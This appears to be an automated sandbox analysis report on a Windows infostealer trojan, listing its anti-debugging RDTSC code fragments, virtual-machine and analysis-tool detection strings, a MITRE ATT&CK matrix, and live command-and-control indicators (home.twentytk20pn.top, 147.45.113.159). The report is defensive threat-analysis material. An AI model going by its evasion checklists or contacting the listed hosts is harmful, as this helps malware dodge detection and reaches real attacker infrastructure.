Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 714077E second address: 7140785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140785 second address: 71407AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804C8F2DA9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140A70 second address: 7140AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 call 00007F804CF71E7Ah 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 jmp 00007F804CF71E81h 0x00000016 push dword ptr [ebp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, edx 0x0000001e push edi 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7140AA2 second address: 7140B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F804C8F2D9Eh 0x00000009 add esi, 15CEE9C8h 0x0000000f jmp 00007F804C8F2D9Bh 0x00000014 popfd 0x00000015 jmp 00007F804C8F2DA8h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 jmp 00007F804C8F2DA0h 0x00000025 push dword ptr [ebp+08h] 0x00000028 pushad 0x00000029 push eax 0x0000002a jmp 00007F804C8F2D9Dh 0x0000002f pop eax 0x00000030 call 00007F804C8F2DA1h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0A4D second address: 71B0A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0A62 second address: 71B0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F804C8F2D9Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov eax, 3337F67Dh 0x00000017 mov cx, 7D79h 0x0000001b popad 0x0000001c mov dl, byte ptr [ebp+14h] 0x0000001f jmp 00007F804C8F2DA4h 0x00000024 mov eax, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 call 00007F804C8F2D9Eh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0ABE second address: 71B0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 and dl, 00000007h 0x0000000c jmp 00007F804CF71E83h 0x00000011 test eax, eax 0x00000013 jmp 00007F804CF71E86h 0x00000018 je 00007F80BCCC7573h 0x0000001e jmp 00007F804CF71E80h 0x00000023 sub ecx, ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push ecx 0x00000029 pop edx 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71B0B15 second address: 71B0B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F804C8F2D9Bh 0x00000008 pop esi 0x00000009 mov bx, 6BECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 inc ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F804C8F2D9Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A046B second address: 71A0509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F804CF71E7Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007F804CF71E7Eh 0x00000017 call 00007F804CF71E82h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pushad 0x0000001f movzx esi, bx 0x00000022 mov bx, 0A6Eh 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 jmp 00007F804CF71E82h 0x0000002e mov dword ptr [esp], ebx 0x00000031 pushad 0x00000032 mov si, 08CDh 0x00000036 call 00007F804CF71E7Ah 0x0000003b jmp 00007F804CF71E82h 0x00000040 pop ecx 0x00000041 popad 0x00000042 push esp 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov cx, bx 0x00000049 mov eax, edx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0509 second address: 71A0524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0524 second address: 71A0528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0528 second address: 71A0537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A0537 second address: 71A055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 mov dh, ABh 0x00000009 popad 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d jmp 00007F804CF71E82h 0x00000012 sub ecx, ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A055D second address: 71A057B instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F804C8F2DA5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A057B second address: 71A05AE instructions: 0x00000000 rdtsc 0x00000002 call 00007F804CF71E80h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F804CF71E88h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A05AE second address: 71A05BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A05BD second address: 71A05D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A05D1 second address: 71A05E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2D9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A05E0 second address: 71A05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 71A05E5 second address: 71A0689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 00000001h 0x0000000e jmp 00007F804C8F2DA7h 0x00000013 lock cmpxchg dword ptr [esi], ecx 0x00000017 jmp 00007F804C8F2DA6h 0x0000001c mov ecx, eax 0x0000001e jmp 00007F804C8F2DA0h 0x00000023 cmp ecx, 01h 0x00000026 pushad 0x00000027 movzx eax, bx 0x0000002a push edi 0x0000002b mov ax, 5CD5h 0x0000002f pop eax 0x00000030 popad 0x00000031 jne 00007F80BC634D20h 0x00000037 pushad 0x00000038 push edx 0x00000039 jmp 00007F804C8F2D9Ah 0x0000003e pop eax 0x0000003f mov bh, E0h 0x00000041 popad 0x00000042 pop edi 0x00000043 pushad 0x00000044 push ecx 0x00000045 call 00007F804C8F2D9Bh 0x0000004a pop ecx 0x0000004b pop edi 0x0000004c popad 0x0000004d pop esi 0x0000004e jmp 00007F804C8F2DA4h 0x00000053 pop ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push edx 0x00000058 pop eax 0x00000059 push edx 0x0000005a pop eax 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7160AEA second address: 7160AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804CF71E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7160AF9 second address: 7160B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7160B11 second address: 7160B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F804CF71E87h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F804CF71E85h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7160B4A second address: 7160BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F804C8F2D9Ah 0x00000013 sub al, 00000068h 0x00000016 jmp 00007F804C8F2D9Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F804C8F2DA8h 0x00000022 add si, 9CC8h 0x00000027 jmp 00007F804C8F2D9Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7160BA8 second address: 7160BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: 7160BAE second address: 7160BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSpecial instruction interceptor: First address: ACDB5B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSpecial instruction interceptor: First address: C73E97 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSpecial instruction interceptor: First address: ACB0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSpecial instruction interceptor: First address: C82CAC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSpecial instruction interceptor: First address: CF75A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00699980 rdtsc 0_2_00699980
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe TID: 7776Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004B255D
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004B29FF
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004B255D
Source: Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Tsy9P2T9yF.exe, 00000000.00000003.1426129991.00000000069B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?}
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Tsy9P2T9yF.exeBinary or memory string: Hyper-V RAW
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Tsy9P2T9yF.exe, 00000000.00000003.1423329645.0000000001123000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000003.1482258822.000000000117E000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000003.1482408048.000000000117F000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1492359367.0000000001192000.00000004.00000020.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000003.1482533819.0000000001191000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_071201B4 Start: 07120363 End: 071203070_2_071201B4
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_07180A0C Start: 071809DE End: 071809D80_2_07180A0C
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile opened: NTICE
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile opened: SICE
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeCode function: 0_2_00699980 rdtsc 0_2_00699980
Source: Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: >MU{Program Manager
Source: Tsy9P2T9yF.exe, 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: o>MU{Program Manager
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.11:49723 -> 147.45.113.159:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Tsy9P2T9yF.exe61%ReversingLabsWin32.Trojan.Leonem
Tsy9P2T9yF.exe100%AviraTR/Crypt.TPM.Gen
Tsy9P2T9yF.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    home.twentytk20pn.top
    		147.45.113.159
    		truefalse
      		high
      httpbin.org
      		34.226.108.155
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmlTsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://html4/loose.dtdTsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#Tsy9P2T9yF.exefalse
                  		high
                  https://httpbin.org/ipbeforeTsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmlTsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#Tsy9P2T9yF.exefalse
                        		high
                        https://curl.se/docs/http-cookies.html#Tsy9P2T9yF.exefalse
                          		high
                          https://curl.se/docs/alt-svc.htmlTsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://.cssTsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://.jpgTsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                                    		high
                                    http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFTsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322MTsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        34.226.108.155
                                        		httpbin.orgUnited States
                                        		14618AMAZON-AESUSfalse
                                        147.45.113.159
                                        		home.twentytk20pn.topRussian Federation
                                        		2895FREE-NET-ASFREEnetEUfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1578993
                                        Start date and time:2024-12-20 17:29:24 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 11s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:5
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Tsy9P2T9yF.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:03ae071235d37edc3ea30848462bccbc.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 51%
                                        • Number of executed functions: 76
                                        • Number of non-executed functions: 53
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Stop behavior analysis, all processes terminated

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Tsy9P2T9yF.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        11:30:34API Interceptor3x Sleep call for process: Tsy9P2T9yF.exe modified

